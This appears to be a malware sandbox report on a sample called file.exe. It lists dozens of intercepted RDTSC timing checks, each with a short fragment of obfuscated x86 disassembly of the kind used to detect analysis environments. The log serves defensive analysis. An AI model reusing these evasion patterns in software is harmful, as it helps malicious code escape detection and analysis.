Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 953398 second address: 953416 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FFBC8B2DAA1h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D1F06h], ecx 0x00000012 push dword ptr fs:[00000000h] 0x00000019 jo 00007FFBC8B2DA9Ch 0x0000001f add dword ptr [ebp+1244E131h], eax 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c mov eax, dword ptr [ebp+122D1505h] 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 call 00007FFBC8B2DA98h 0x0000003a pop eax 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f add dword ptr [esp+04h], 00000019h 0x00000047 inc eax 0x00000048 push eax 0x00000049 ret 0x0000004a pop eax 0x0000004b ret 0x0000004c jmp 00007FFBC8B2DAA1h 0x00000051 push FFFFFFFFh 0x00000053 mov edi, dword ptr [ebp+122D39F6h] 0x00000059 push eax 0x0000005a push ecx 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 953416 second address: 95341A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 954313 second address: 954336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FFBC8B2DAA7h 0x0000000a popad 0x0000000b push eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95648B second address: 95648F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95648F second address: 9564A1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FFBC8B2DA96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9564A1 second address: 9564A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9564A5 second address: 9564AF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FFBC8B2DA96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9584D9 second address: 9584DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95249C second address: 9524CD instructions: 0x00000000 rdtsc 0x00000002 jne 00007FFBC8B2DA96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007FFBC8B2DAADh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9524CD second address: 9524D7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FFBC91A3BDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FEC58 second address: 8FECA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007FFBC8B2DAA4h 0x0000000d jmp 00007FFBC8B2DAA2h 0x00000012 jmp 00007FFBC8B2DAA1h 0x00000017 ja 00007FFBC8B2DA96h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FECA2 second address: 8FECA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FECA6 second address: 8FECC0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFBC8B2DAA0h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FECC0 second address: 8FECC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 963296 second address: 96329A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96350D second address: 963517 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FFBC91A3BD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96863D second address: 968643 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9691F7 second address: 969219 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007FFBC91A3BD8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 969219 second address: 969233 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FFBC8B2DA9Ch 0x00000008 jne 00007FFBC8B2DA96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push esi 0x00000016 pop esi 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 969233 second address: 969266 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FFBC91A3BE9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 969266 second address: 791B46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007FFBC8B2DAA9h 0x0000000f push dword ptr [ebp+122D0595h] 0x00000015 cld 0x00000016 jbe 00007FFBC8B2DAA2h 0x0000001c jc 00007FFBC8B2DA9Ch 0x00000022 jbe 00007FFBC8B2DA96h 0x00000028 call dword ptr [ebp+122D1DD7h] 0x0000002e pushad 0x0000002f mov dword ptr [ebp+122D189Fh], edi 0x00000035 xor eax, eax 0x00000037 jmp 00007FFBC8B2DAA0h 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 mov dword ptr [ebp+122D189Fh], esi 0x00000046 mov dword ptr [ebp+122D39AAh], eax 0x0000004c jmp 00007FFBC8B2DA9Ch 0x00000051 jmp 00007FFBC8B2DAA7h 0x00000056 mov esi, 0000003Ch 0x0000005b jmp 00007FFBC8B2DAA9h 0x00000060 add esi, dword ptr [esp+24h] 0x00000064 jmp 00007FFBC8B2DAA6h 0x00000069 clc 0x0000006a lodsw 0x0000006c stc 0x0000006d add eax, dword ptr [esp+24h] 0x00000071 clc 0x00000072 mov ebx, dword ptr [esp+24h] 0x00000076 sub dword ptr [ebp+122D189Fh], edx 0x0000007c nop 0x0000007d push esi 0x0000007e push eax 0x0000007f push edx 0x00000080 pushad 0x00000081 popad 0x00000082 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96DCAD second address: 96DCB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96E392 second address: 96E3AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FFBC8B2DAA0h 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96E3AB second address: 96E3B1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96E3B1 second address: 96E3C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBC8B2DA9Fh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96E6B6 second address: 96E6C8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FFBC91A3BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FFBC91A3BD6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96EAC7 second address: 96EADD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA0h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96EADD second address: 96EAE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96EC5E second address: 96EC64 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96EC64 second address: 96EC7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FFBC91A3BDCh 0x0000000c jp 00007FFBC91A3BD6h 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007FFBC91A3BD6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96EDD0 second address: 96EE18 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFBC8B2DAB9h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFBC8B2DAA8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 974852 second address: 97485A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97485A second address: 974871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FFBC8B2DAA0h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 974871 second address: 974875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 974875 second address: 97487B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97487B second address: 974886 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9736AB second address: 9736B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 973811 second address: 973818 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 973818 second address: 973821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 973821 second address: 97382B instructions: 0x00000000 rdtsc 0x00000002 jo 00007FFBC91A3BD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 973965 second address: 973969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 973969 second address: 973985 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007FFBC91A3BD6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 973C81 second address: 973C95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DA9Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 973C95 second address: 973C99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 973C99 second address: 973CEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007FFBC8B2DA9Ah 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 push ecx 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a pop ecx 0x0000001b pushad 0x0000001c js 00007FFBC8B2DA96h 0x00000022 pushad 0x00000023 popad 0x00000024 jmp 00007FFBC8B2DAA5h 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c push ebx 0x0000002d jng 00007FFBC8B2DA96h 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9740FB second address: 974101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 974101 second address: 97412B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC8B2DAA2h 0x00000009 popad 0x0000000a jmp 00007FFBC8B2DAA3h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FB7B3 second address: 8FB7B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FB7B7 second address: 8FB7BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FB7BD second address: 8FB7CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FFBC91A3BD6h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FB7CD second address: 8FB7D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9746DD second address: 9746F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FFBC91A3BE3h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97840A second address: 97843C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA3h 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FFBC8B2DA96h 0x0000000f jmp 00007FFBC8B2DAA5h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 946A79 second address: 946A83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 946FA5 second address: 946FB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFBC8B2DA9Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 946FB4 second address: 791B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jbe 00007FFBC91A3BDCh 0x00000010 push dword ptr [ebp+122D0595h] 0x00000016 push ecx 0x00000017 xor dword ptr [ebp+122D23F0h], edi 0x0000001d pop edi 0x0000001e call dword ptr [ebp+122D1DD7h] 0x00000024 pushad 0x00000025 mov dword ptr [ebp+122D189Fh], edi 0x0000002b xor eax, eax 0x0000002d jmp 00007FFBC91A3BE0h 0x00000032 mov edx, dword ptr [esp+28h] 0x00000036 mov dword ptr [ebp+122D189Fh], esi 0x0000003c mov dword ptr [ebp+122D39AAh], eax 0x00000042 jmp 00007FFBC91A3BDCh 0x00000047 jmp 00007FFBC91A3BE7h 0x0000004c mov esi, 0000003Ch 0x00000051 jmp 00007FFBC91A3BE9h 0x00000056 add esi, dword ptr [esp+24h] 0x0000005a jmp 00007FFBC91A3BE6h 0x0000005f clc 0x00000060 lodsw 0x00000062 stc 0x00000063 add eax, dword ptr [esp+24h] 0x00000067 clc 0x00000068 mov ebx, dword ptr [esp+24h] 0x0000006c sub dword ptr [ebp+122D189Fh], edx 0x00000072 nop 0x00000073 push esi 0x00000074 push eax 0x00000075 push edx 0x00000076 pushad 0x00000077 popad 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9470B3 second address: 9470CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FFBC8B2DA96h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jl 00007FFBC8B2DAA8h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9470CC second address: 9470D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9470D0 second address: 9470D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 947220 second address: 94725D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jnp 00007FFBC91A3BE9h 0x00000011 jmp 00007FFBC91A3BE3h 0x00000016 jnc 00007FFBC91A3BDCh 0x0000001c jno 00007FFBC91A3BD6h 0x00000022 popad 0x00000023 mov eax, dword ptr [eax] 0x00000025 push ecx 0x00000026 pushad 0x00000027 jc 00007FFBC91A3BD6h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9473A6 second address: 9473F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 jmp 00007FFBC8B2DA9Ch 0x0000000b pop edx 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FFBC8B2DAA7h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, esi 0x00000018 pushad 0x00000019 pushad 0x0000001a jmp 00007FFBC8B2DAA0h 0x0000001f mov bl, C3h 0x00000021 popad 0x00000022 ja 00007FFBC8B2DA96h 0x00000028 popad 0x00000029 nop 0x0000002a push ecx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9473F9 second address: 94741D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94741D second address: 947421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 947421 second address: 947425 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 947599 second address: 9475AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FFBC8B2DA9Fh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 947A38 second address: 947A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 947A3C second address: 947A43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 947DD8 second address: 947DDE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 947DDE second address: 9225B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DA9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a je 00007FFBC8B2DAADh 0x00000010 push edx 0x00000011 jmp 00007FFBC8B2DAA5h 0x00000016 pop edx 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push edx 0x0000001b call 00007FFBC8B2DA98h 0x00000020 pop edx 0x00000021 mov dword ptr [esp+04h], edx 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc edx 0x0000002e push edx 0x0000002f ret 0x00000030 pop edx 0x00000031 ret 0x00000032 call dword ptr [ebp+122D2727h] 0x00000038 jno 00007FFBC8B2DAB0h 0x0000003e push esi 0x0000003f jng 00007FFBC8B2DA9Eh 0x00000045 push edi 0x00000046 pop edi 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97885B second address: 978861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9789CC second address: 9789D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9789D2 second address: 9789D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9789D8 second address: 9789E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FFBC8B2DA96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 978B4C second address: 978B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 978C9A second address: 978CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC8B2DA9Ch 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jnp 00007FFBC8B2DA98h 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 jnl 00007FFBC8B2DA96h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 978F7F second address: 978FF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FFBC91A3BE2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FFBC91A3BDCh 0x00000011 jng 00007FFBC91A3BEEh 0x00000017 jmp 00007FFBC91A3BE8h 0x0000001c pushad 0x0000001d jmp 00007FFBC91A3BE4h 0x00000022 jmp 00007FFBC91A3BE4h 0x00000027 jnc 00007FFBC91A3BD6h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 979174 second address: 97917B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97917B second address: 9791AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFBC91A3BE8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007FFBC91A3BD8h 0x00000015 push edx 0x00000016 pop edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9791AA second address: 9791AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 984F19 second address: 984F3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FFBC91A3BE7h 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 984F3C second address: 984F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 983D4E second address: 983D54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
